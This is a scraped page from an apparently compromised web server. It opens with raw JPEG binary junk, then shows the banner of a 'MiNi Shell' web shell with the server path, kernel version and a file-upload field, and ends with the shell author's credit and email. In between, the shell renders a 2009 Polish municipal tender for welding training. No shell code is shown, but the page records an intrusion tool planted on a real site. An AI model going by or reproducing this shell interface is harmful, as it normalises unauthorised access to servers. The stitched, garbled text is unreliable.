JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090527/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090527/80953-N-2009.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Spawanie stali elektrodą topliwą w osłonie gazów aktywnych /MAG-135/ dla beneficjentów ostatecznych projektu Wsparcie</b><br>
<b>Numer ogłoszenia: 80953 - 2009; data zamieszczenia: 27.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim , ul. Cekanowska 5, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 044 7237353, faks 044 7233489.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Spawanie stali elektrodą topliwą w osłonie gazów aktywnych /MAG-135/ dla beneficjentów ostatecznych projektu Wsparcie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest szkolenie grupowe dla 5 beneficjentów ostatecznych w zakresie Spawanie stali elektrodą topliwą w osłonie gazów aktywnych /MAG-135/:
- termin rozpoczęcia szkolenia: szkolenie winno rozpocząć się nie później niż w ciagu 7 dni po zawarciu umowy. 
- termin wykonania zamówienia: najpóźniej do 31 lipca 2009r.
- liczba dni szkolenia: maksymalnie 40 kolejnych dni roboczych;
- szkolenie winno odbywać się pięć razy w tygodniu od poniedziałku do piątku w dni robocze;
- liczba godzin szkolenia: 126 godzin (zegarowych) na jednego uczestnika, nie mniej niż 5 godzin (zegarowych) dziennie i nie więcej niż 8 godzin (zegarowych) dziennie, w tym: 26 godzin (zegarowych) z wiedzy teoretycznej i 100 godzin (zegarowych) z wiedzy praktycznej;
- miejsce odbywania szkolenia: teren miasta Tomaszowa Mazowieckiego lub miejscowość oddalona od Tomaszowa Mazowieckiego do 40 km;
- zakres tematyczny szkolenia: szkolenie teoretyczne i praktyczne mające na celu umożliwić uczestnikom szkolenia zdobycie uprawnień do spawania stali elektrodą topliwą w osłonie gazów aktywnych /MAG-135/ - egzamin zgodny z Wytycznymi W-07/IS-02 i W-07/IS-03 Instytutu Spawalnictwa w Gliwicach,
- spawalnia musi posiadać atest Instytutu Spawalnictwa w Gliwicach.
Zakres szkolenia powinien być opracowany na bazie standardów kwalifikacji i szkoleń Ministerstwa Pracy i Polityki Społecznej znajdujących się na stronie www.standardyiszkolenia.praca.gov.pl 
Po zakończeniu szkolenia beneficjenci ostateczni otrzymają następujące dokumenty:
1. Zaświadczenie o jego ukończeniu zgodnie z rozporządzeniem MEN z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
2. Certyfikat o ukończeniu szkolenia z kolorowymi logotypami: Programu Operacyjnego Kapitał Ludzki Narodowa Strategia Spójności, Unii Europejskiej z odniesieniem Europejski Fundusz Społeczny, Instytucji Pośredniczącej 2 Stopnia tj. Wojewódzkiego Urzędu Pracy w Łodzi oraz Realizatora Projektu Miejskiego Ośrodka Pomocy Społecznej.
Kopie w/w dokumentów Wykonawca ma obowiązek dostarczyć do siedziby Zamawiającego w terminie 5 dni od ukończenia szkolenia.
2. Wymagania dla punktu 2.2 SIWZ:
- Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi indywidualne stanowisko do szkolenia. Każdy z uczestników otrzyma od Wykonawcy najpóźniej w dniu rozpoczęcia szkolenia zestaw niezbędnych materiałów pomocniczych, między innymi: minimum 1 notatnik, minimum 2 długopisy.    
- Wszystkie materiały oraz dokumenty przygotowywane i wydawane w ramach szkolenia winny być oznaczone zgodnie z: Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki wydane przez Departament Zarządzania Europejskim Funduszem Społecznym, Ministerstwo Rozwoju Regionalnego, Instytucja Zarządzająca Programem Operacyjnym Kapitał Ludzki, Warszawa, 4 luty 2009 r. 
- Powyższe wytyczne oraz wzory logotypów dostępne są na stronie: http://www.wup.lodz.pl/
- Zajęcia z zakresów tematycznych określonych w punkcie 2.2 SIWZ winny odbywać się pięć razy w tygodniu w dni robocze od poniedziałku do piątku. 
Wykonawca zobowiązany jest prowadzić dziennik zajęć zawierający: wymiar godzin, tematy zajęć edukacyjnych oraz listę obecności i oddać Zamawiającemu kserokopię dziennika zajęć w terminie 5 dni po zakończeniu szkolenia. 
- Wykonawca zobowiązany jest prowadzić dokumentację dotyczącą prowadzenia szkoleń, w tym: prowadzenie list obecności, rejestrowanie i niezwłoczne zgłaszanie Zamawiającemu w danym dniu, najpóźniej w następnym dniu o każdej nieobecności uczestnika na szkoleniu lub rezygnacji z uczestnictwa w szkoleniu w trakcie jego trwania - pod rygorem odmowy zapłaty za szkolenie tych osób. Prowadzenie listy obecności na zajęciach polega na tym, że każdy uczestnik szkolenia potwierdza obecność na zajęciach własnoręcznym podpisem. Wykonawca winien dostarczyć jej kserokopię do siedziby Zamawiającego raz na dwa tygodnie oraz niezwłocznie po zakończeniu szkolenia.
- Szkolenie powinno zakończyć się egzaminem ze zdobytej wiedzy teoretycznej i praktycznej. Wykonawca powiadamia Zamawiającego, na 7 dni wcześniej, o dacie, miejscu i godzinie egzaminu uczestników szkolenia. 
- Wykonawca zobowiązany jest w terminie 5 dni od zakończenia szkolenia przeprowadzić egzamin ze zdobytej wiedzy. Ponadto Wykonawca zobowiązany jest do sporządzenia protokołu z egzaminu oraz prowadzenia rejestru wydanych zaświadczeń potwierdzających ukończenie szkolenia i uzyskania kwalifikacji. Wykonawca winien dostarczyć kserokopię protokołu z egzaminu oraz rejestru wydanych zaświadczeń potwierdzających ukończenie szkolenia i uzyskania kwalifikacji Zamawiającemu w terminie 3 dni po egzaminie.
- Zajęcia teoretyczne winny być prowadzone przez co najmniej 1 osobę z wykształceniem wyższym kierunkowym i co najmniej 5 letnim stażem pracy zgodnym z kierunkiem kształcenia. Osoba ta powinna posiadać zaświadczenie potwierdzajace przygotowanie pedagogiczne. 
- Zajęcia praktyczne winny być prowadzone przez minimum 2 osoby z wykształceniem minimum średnim kierunkowym i co najmniej 5 letnim stażem pracy zgodnym z kierunkiem kształcenia. Osoba ta powinna posiadać zaświadczenie potwierdzające przygotowanie pedagogiczne.  
- Zamawiający zastrzega sobie prawo kontroli prawidłowości przebiegu szkolenia.
- Wykonawca zobowiązany jest ubezpieczyć na czas trwania szkolenia i przewozu uczestników szkolenia, wskazanych przez Zamawiającego (osoby biorące udział w szkoleniu) od następstw nieszczęśliwych wypadków .
- Wykonawca zobowiązany jest do przeprowadzenia ankiety ewaluacyjnej w ostatnim dniu szkolenia, która winna badać rezultaty osiągane przez beneficjentów zgodnie z zakresem tematycznym szkolenia. Wykonawca zobowiązany jest w ciągu 3 dni po zakończeniu szkolenia dostarczyć do siedziby Zamawiającego ankietę ewaluacyjną - której wzór stanowi załącznik nr 3 do umowy. 
- Wykonawca zobowiązany jest, w przypadku prowadzenia szkolenia poza Tomaszowem Mazowieckim do:
1)przewozu beneficjentów z miejsca wskazanego przez Zamawiającego tj. ul. P.O.W w Tomaszowie Mazowieckim (przy Muzeum) do miejsca szkolenia i z miejsca szkolenia do miejsca wskazanego przez Zamawiającego tj. ul. P.O.W w Tomaszowie Mazowieckim (przy Muzeum),
2)zapewnienie beneficjentom podczas transportu warunków bezpieczeństwa i higieny odpowiadających rodzajowi transportu,
3) punktualnego wykonywania przewozu beneficjentów zgodnie z harmonogramem zajęć.
- Przez zakończenie szkolenia rozumie się przeprowadzenie 126 godzin szkolenia dla beneficjentów ostatecznych projektu Wsparcie.
- Koszt szkolenia powinien zawierać: należność przysługującą jednostce szkoleniowej, wynajęcie sali, wynagrodzenie wykładowców, serwis kawowy, gorący posiłek, ubezpieczenie, transport, zorganizowanie i przeprowadzenie egzaminu, koszt egzaminu itp. 
- Beneficjenci ostateczni we własnym zakresie zobowiązani są zabezpieczyć sobie ubranie robocze.
- W szkoleniu będą uczestniczyć beneficjenci ostateczni posiadający orzeczenia lekarskie o braku przeciwwskazań do podjęcia w/w szkolenia.
- Wykonawca zobowiązany jest zapewnić beneficjentom ostatecznym serwis kawowy oraz gorący posiłek w trakcie szkolenia oraz przerwy na w/w serwis kawowy oraz gorący posiłek:
Pod pojęciem serwisu kawowego w czasie 1 dniowego szkolenia dla 1 grupy należy rozumieć: 
- maszyna do parzenia kawy, kawa wydawana z maszyn do parzenia kawy, naczynia jednorazowego użytku - filiżanki nie mniej niż 4 sztuki na osobę, mieszadełka - nie mniej niż 4 sztuki na osobę, cukier w saszetkach jednorazowych - nie mniej niż 8 sztuk na osobę, śmietanka do kawy w płynie w pojemnikach jednorazowych - nie mniej niż 4 sztuki na osobę, serwetki jednorazowe; w/w produkty spożywcze oraz naczynia jednarazowego użytku winny być najwyższej jakości;
- czajnik elektryczny lub maszyna do parzenia herbaty, herbata w saszetkach jednorazowych pakowana oddzielnie o różnych smakach (herbata czarna owocowa, herbata czarna zwykła)  - nie mniej niż 4 sztuki na osobę, naczynia jednorazowego użytku - kubki - nie mniej niż 4 sztuki na osobę, mieszadełka - nie mniej niż 4 sztuki na osobę, cukier w saszetkach jednorazowych - nie mniej niż 8 sztuk na osobę, serwetki jednorazowe; w/w produkty spożywcze oraz naczynia jednarazowego użytku winny być najwyższej jakości;
- mieszanka ciastek: kruche, maślane, biszkoptowe z galaretką nie mniej niż 15 sztuk na osobę dziennie.
- woda mineralna lub zamiennie napój owocowy w butelkach plastikowych, zakręcanych o poj. 500 ml. - nie mniej niż 2 sztuki na osobę dziennie wody mineralnej lub zamiennie napoi owocowych.  
Serwis kawowy winien być przygotowywany do wyczerpania potrzeb beneficjentów ostatecznych. Produkty podawane podczas serwisu kawowego winny spełniać normy żywieniowe oraz sanitarno-epidemiologiczne.  
Pod pojęciem gorącego posiłku należy rozumieć obiad składający się z drugiego dania: 
- 150g porcja mięsa (waga po przetworzeniu), 150 - 200g gotowanej kaszy, ryżu, makaronu lub ziemniaków oraz 150g surówki. Dopuszcza się raz w tygodniu przygotowanie posiłku bez mięsa i zastąpieniem go produktami z zawartością białka zwierzęcego tj.: ryba - 150g lub jaja - 2 szt. Każdy z posiłków musi zawierać minimum 1000 kalorii. Posiłki muszą być wydawane jako produkty o temperaturze 60oC - 80oC - zgodnie z normami żywieniowymi. 
Gorący posiłek oraz serwis kawowy będzie wydawany od poniedziałku do piątku w dni robocze dla każdego uczestnika szkolenia.
Tygodniowy (pięciodniowy) jadłospis posiłków wraz z gramaturą na cały okres trwania umowy stanowić będzie integralną część oferty. 
W przypadku wyboru oferty Wykonawca zobowiązany jest realizować przedłożony jadłospis..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1.1 Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - warunek 1,
1.2 Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - warunek 2,
1.3 Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - warunek 3,
1.4 Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, zgodnie z art. 24 Ustawy - warunek 4,
1.5 Spełniają i przyjmują warunki zawarte w SIWZ oraz we wzorze umowy - warunek 5.
2. Kryteria oceny spełniania warunków oraz dokumenty, które zobowiązany jest dostarczyć Wykonawca w ramach oferty:
2.1 Warunek 1 uważa się za spełniony, gdy Wykonawca dostarczy:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- aktualny wpis do rejestru instytucji szkoleniowych wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
2.2 Warunek 2 uważa się za spełniony, gdy Wykonawca dostarczy:
- złoży oświadczenie będące załącznikiem do oferty, że posiada niezbędną wiedzę  i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub dołączy pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
- wykaz osób prowadzących szkolenie; 
- dokumenty potwierdzające poziom wykształcenia w/w osób, posiadany staż pracy oraz przygotowanie pedagogiczne osób prowadzących szkolenie zarówno z wiedzy teoretycznej jak i z praktycznej (np. dyplom ukończenia szkoły średniej, studiów, zaświadczenia ukończenia szkoleń, certyfikaty, zaświadczenie o ukończeniu kursu pedagogicznego, świadectwa pracy lub zaświadczenie od pracodawcy potwierdzające 5 letni staż pracy itp.);
2.3 Warunek 3 uważa się za spełniony, gdy Wykonawca dostarczy:
- oświadczenie stanowiące załącznik do oferty - zgodnie z art. 22 ust. 1 pkt. 1- 3 ustawy Prawo zamówień publicznych;
- aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- aktualne, obowiązkowe ubezpieczenie odpowiedzialności cywilnej (OC) posiadaczy pojazdów mechanicznych wraz z ubezpieczeniem następstw nieszczęśliwych wypadków (NW) kierowcy i pasażerów pojazdu mechanicznego oraz inne obowiązkowe ubezpieczenia 	wymagane przepisami prawa (Wykonawca zobowiązuje się zapewnić ciągłość tych ubezpieczeń w okresie wykonywania przedmiotu umowy);
- aktualną licencję na wykonywanie krajowego transportu drogowego osób, zgodnie z obowiązującymi przepisami prawa;
2.4 Warunek 4 uważa się za spełniony, gdy Wykonawca dostarczy:
- oświadczenie, że nie podlega wykluczeniu z postępowania na podstawie art. 24 Ustawy - Prawo zamówień publicznych - załącznik do oferty.
2.5 Warunek 5 uważa się za spełniony, gdy Wykonawca dostarczy:
- oświadczenie, że spełnia i przyjmuje warunki zawarte w SIWZ oraz we wzorze umowy (Oświadczenie zawarte w formularzu oferty).
3. Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia. 
Każdy z w/w warunków ma jednakowe znaczenie i niespełnienie któregokolwiek z nich spowoduje wykluczenie Wykonawcy.
Uwaga: Powyższe dokumenty należy przedstawić w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- aktualny wpis do rejestru instytucji szkoleniowych wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
- złoży oświadczenie będące załącznikiem do oferty, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub dołączy pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 
- wykaz osób prowadzących szkolenie; 
- dokumenty potwierdzające poziom wykształcenia w/w osób, posiadany staż pracy oraz przygotowanie pedagogiczne osób prowadzących szkolenie zarówno z wiedzy teoretycznej jak i z praktycznej (np. dyplom ukończenia szkoły średniej, studiów, zaświadczenia ukończenia szkoleń, certyfikaty, zaświadczenie o ukończeniu kursu pedagogicznego, świadectwa pracy lub zaświadczenie od pracodawcy potwierdzające 5 letni staż pracy itp.);
- oświadczenie stanowiące załącznik do oferty - zgodnie z art. 22 ust. 1 pkt. 1- 3 ustawy Prawo zamówień publicznych;
- aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie, lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
- aktualne, obowiązkowe ubezpieczenie odpowiedzialności cywilnej (OC) posiadaczy pojazdów mechanicznych wraz z ubezpieczeniem następstw nieszczęśliwych wypadków (NW) kierowcy i pasażerów pojazdu mechanicznego oraz inne obowiązkowe ubezpieczenia 	wymagane przepisami prawa (Wykonawca zobowiązuje się zapewnić ciągłość tych ubezpieczeń w okresie wykonywania przedmiotu umowy);
- aktualną licencję na wykonywanie krajowego transportu drogowego osób, zgodnie z obowiązującymi przepisami prawa;
- oświadczenie, że nie podlega wykluczeniu z postępowania na podstawie art. 24 Ustawy -  Prawo zamówień publicznych - załącznik do oferty.
- oświadczenie, że spełnia i przyjmuje warunki zawarte w SIWZ oraz we wzorze umowy (Oświadczenie zawarte w formularzu oferty)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> htpp://mopstomaszow.nbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim ul. Cekanowska 5 97-200 Tomaszów Mazowiecki - pokój nr 7.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim ul. Cekanowska 5 97-200 Tomaszów Mazowiecki - pokój nr 16.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com